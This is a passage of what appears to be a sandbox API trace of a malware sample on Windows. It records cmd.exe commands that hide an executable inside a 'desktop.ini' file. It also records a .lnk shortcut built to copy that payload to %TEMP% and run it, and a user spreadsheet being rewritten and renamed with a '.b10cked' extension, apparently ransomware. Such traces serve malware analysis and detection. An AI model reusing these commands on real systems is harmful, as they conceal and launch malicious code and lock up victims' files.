\"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0128.447] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0128.447] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1") returned 0x32 [0128.447] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" & del /f /q 
\"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x186 | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\EEBSYM5\\DOCUME~1\\2W7_EW\\5OWEKS~1\\WXMD5U~1\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\EEBSYM5\\DOCUME~1\\2W7_EW\\5OWEKS~1\\WXMD5U~1\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\DOCUME~1\\2W7_EW\\5OWEKS~1\\WXMD5U~1\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\EEBSYM5\\DOCUME~1\\2W7_EW\\5OWEKS~1\\WXMD5U~1\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x186 [0128.447] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0128.447] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: 
lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\"", lpProcessInformation=0x12fb78*(hProcess=0x114, hThread=0x110, dwProcessId=0x910, dwThreadId=0x90c)) returned 1 [0128.453] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0xffffffff) returned 0x0 [0129.268] CloseHandle (hObject=0x114) returned 1 [0129.268] CloseHandle (hObject=0x110) returned 1 [0129.268] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0129.268] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0129.269] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0129.269] GetTickCount () returned 0x295d8 [0129.269] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=18605792672) returned 1 [0129.269] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x44\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0129.269] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x77\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0129.269] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, 
cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6e\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0129.269] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x43\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0129.269] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x77\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0129.269] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x4a\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0129.269] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6d\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0129.269] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x38\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0129.269] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0129.269] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0129.269] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0129.269] CharUpperBuffW (in: lpsz="explorer.exe \"WxMD5ucxt4TTzYn6xhkt\" 
& type \"WxMD5ucxt4TTzYn6xhkt\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x79 | out: lpsz="EXPLORER.EXE \"WXMD5UCXT4TTZYN6XHKT\" & TYPE \"WXMD5UCXT4TTZYN6XHKT\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x79 [0129.269] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0129.269] CharUpperBuffW (in: lpsz="explorer.exe \"WxMD5ucxt4TTzYn6xhkt\" & type \"WxMD5ucxt4TTzYn6xhkt\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x7a | out: lpsz="EXPLORER.EXE \"WXMD5UCXT4TTZYN6XHKT\" & TYPE \"WXMD5UCXT4TTZYN6XHKT\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x7a [0129.269] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0129.269] CoInitialize (pvReserved=0x0) returned 0x0 [0129.269] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0129.271] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0129.271] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0129.271] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0129.273] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C 
explorer.exe \"WxMD5ucxt4TTzYn6xhkt\" & type \"WxMD5ucxt4TTzYn6xhkt\\desktop.ini\" > \"%TEMP%\\DwnCwJm8.exe\" && \"%TEMP%\\DwnCwJm8.exe\"") returned 0x0 [0129.273] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0129.273] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0129.273] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0129.273] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt.lnk", fRemember=0) returned 0x0 [0129.279] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0129.279] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0129.279] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0129.279] CoUninitialize () [0129.280] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0129.280] ReleaseMutex (hMutex=0xf8) returned 1 [0129.280] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0129.280] ReleaseMutex (hMutex=0xf8) returned 1 [0129.280] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0129.280] ReleaseMutex (hMutex=0xf8) returned 1 [0129.280] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0129.280] ReleaseMutex (hMutex=0xf8) returned 1 [0129.280] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\7jmxgwY9.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\7jmxgwy9.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0129.280] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0129.280] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 
dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13545 [0129.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0129.281] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=18606982281) returned 1 [0129.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0129.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13545 [0129.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0129.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0129.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13545 [0129.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0129.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0129.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x13545 [0129.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0129.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 
dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0129.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13545 [0129.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0129.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0129.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13545 [0129.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0129.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0129.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13545 [0129.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0129.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0129.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13545 [0129.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0129.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0129.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13545 [0129.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0129.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0129.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13545 [0129.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0129.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x1305d [0129.282] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0129.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0129.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0129.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x13545 [0129.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0129.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0129.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0129.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x13545 [0129.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0129.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0129.283] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x9aa1, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x9aa1, lpOverlapped=0x0) returned 1 [0129.284] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0129.284] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x9aa1, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x9aa1, lpOverlapped=0x0) returned 1 [0129.284] SetFilePointer (in: hFile=0x114, lDistanceToMove=-39585, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x9aa4 [0129.284] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x9aa1, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x9aa1, lpOverlapped=0x0) returned 1 [0129.284] SetFilePointer (in: hFile=0x114, lDistanceToMove=-39585, 
lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x9aa4 [0129.284] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x9aa1, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x9aa1, lpOverlapped=0x0) returned 1 [0129.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7jmxgwY9.xlsx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0129.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7jmxgwY9.xlsx", cchWideChar=13, lpMultiByteStr=0x131326c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7jmxgwY9.xlsx", lpUsedDefaultChar=0x0) returned 13 [0129.288] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x13545 [0129.288] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0129.288] CloseHandle (hObject=0x114) returned 1 [0129.289] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\7jmxgwY9.xlsx", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\7JMXGW~1.XLS") returned 0x26 [0129.290] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\") returned 0x1a [0129.290] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\7JMXGW~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\7jmxgwY9.xlsx.b10cked\"", lpProcessAttributes=0x0, 
lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\7JMXGW~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\7jmxgwY9.xlsx.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0x7b8, dwThreadId=0x7dc)) returned 1 [0129.291] CloseHandle (hObject=0x110) returned 1 [0129.291] CloseHandle (hObject=0x114) returned 1 [0129.291] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0129.291] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\", cchLength=0x48 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\WXMD5UCXT4TTZYN6XHKT\\") returned 0x48 [0129.291] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount1=27, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\WXMD5UCXT4TTZYN6XHKT\\", cchCount2=72) returned 1 [0129.292] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0129.292] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0129.292] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount1=27, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 